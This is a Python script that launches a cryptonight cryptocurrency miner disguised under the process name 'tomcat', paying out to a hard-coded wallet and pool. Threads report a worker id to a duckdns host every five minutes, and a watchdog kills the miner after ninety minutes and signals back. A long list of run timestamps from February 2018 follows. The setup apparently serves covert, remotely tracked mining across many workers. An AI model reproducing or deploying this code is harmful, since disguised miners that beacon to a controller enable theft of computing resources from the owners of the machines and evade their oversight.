import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:04:03.775129
#2018-02-17 16:50:05.051253
#2018-02-17 18:38:06.437755
#2018-02-17 20:26:05.390094
#2018-02-17 22:13:01.908153
#2018-02-17 23:57:02.030605
#2018-02-18 01:48:04.575405
#2018-02-18 03:34:02.167253
#2018-02-18 05:22:05.040631
#2018-02-18 07:13:05.021434
#2018-02-18 09:01:03.440331
#2018-02-18 10:48:03.608285
#2018-02-18 12:36:06.296419
#2018-02-18 14:22:02.070761
#2018-02-18 16:13:01.386145
#2018-02-18 18:02:06.241236
#2018-02-18 19:49:05.115664
#2018-02-18 21:36:06.603814
#2018-02-18 23:24:06.520422
#2018-02-19 01:10:08.015057
#2018-02-19 02:56:04.575875
#2018-02-19 04:43:06.710041
#2018-02-19 06:28:01.501541
#2018-02-19 08:18:01.386332
#2018-02-19 10:07:08.815369
#2018-02-19 11:56:08.493903
#2018-02-19 13:43:03.732113
#2018-02-19 15:31:08.940857
#2018-02-19 17:18:04.217187
#2018-02-19 19:07:04.808155
#2018-02-19 20:54:03.739610
#2018-02-19 22:42:06.465651
#2018-02-20 00:27:01.347674
#2018-02-20 02:14:05.727039
#2018-02-20 04:05:09.586974
#2018-02-20 05:48:07.253373
#2018-02-20 07:33:06.767378
#2018-02-20 09:18:03.516685
#2018-02-20 11:02:09.436064
#2018-02-20 12:51:08.410447
#2018-02-20 14:36:04.761750
#2018-02-20 16:22:01.346130
#2018-02-20 18:08:10.139132
#2018-02-20 20:01:01.439383
#2018-02-20 21:47:09.723348
#2018-02-20 23:28:08.323981
#2018-02-21 01:13:04.460980
#2018-02-21 03:01:02.039888
#2018-02-21 04:48:07.747963
#2018-02-21 06:37:08.057433
#2018-02-21 08:23:02.119951
#2018-02-21 10:08:05.223697
#2018-02-21 11:56:08.407523
#2018-02-21 13:46:03.951688
#2018-02-21 15:28:01.294526
#2018-02-21 17:18:05.667455
#2018-02-21 19:06:04.037612
#2018-02-21 20:54:08.367706
#2018-02-21 22:41:04.176681
#2018-02-22 00:29:07.973447
#2018-02-22 02:17:04.882202
#2018-02-22 04:03:02.194939
#2018-02-22 05:48:07.787609
#2018-02-22 07:33:08.565549
#2018-02-22 09:21:06.936588
#2018-02-22 11:07:07.874606
#2018-02-22 12:52:07.893349
#2018-02-22 14:41:09.030771
#2018-02-22 16:26:01.536179
#2018-02-22 18:12:11.076319
#2018-02-22 20:03:01.330329
#2018-02-22 21:51:04.293751
#2018-02-22 23:39:13.378995
#2018-02-23 01:26:04.282111
#2018-02-23 03:12:03.642512
#2018-02-23 04:58:01.652474
#2018-02-23 06:42:01.592090
#2018-02-23 08:32:03.833483
#2018-02-23 10:46:05.721512
#2018-02-23 12:44:02.119464
#2018-02-23 14:28:05.638582
#2018-02-23 16:18:06.020510
#2018-02-23 18:04:03.086196
#2018-02-23 19:49:05.319192
#2018-02-23 21:32:05.741028
#2018-02-23 23:19:07.150258
#2018-02-24 01:11:05.286570
#2018-02-24 03:03:01.439780
#2018-02-24 04:49:06.719695
#2018-02-24 06:35:03.198596
#2018-02-24 08:24:03.785085
#2018-02-24 10:10:07.399761
#2018-02-24 12:05:04.562495
#2018-02-24 13:52:07.267165
#2018-02-24 15:42:06.051285
#2018-02-24 17:35:08.617228
#2018-02-24 19:21:07.771040
#2018-02-24 21:12:07.365211
#2018-02-24 23:46:01.386412
#2018-02-25 03:06:07.666794
#2018-02-25 07:05:06.166280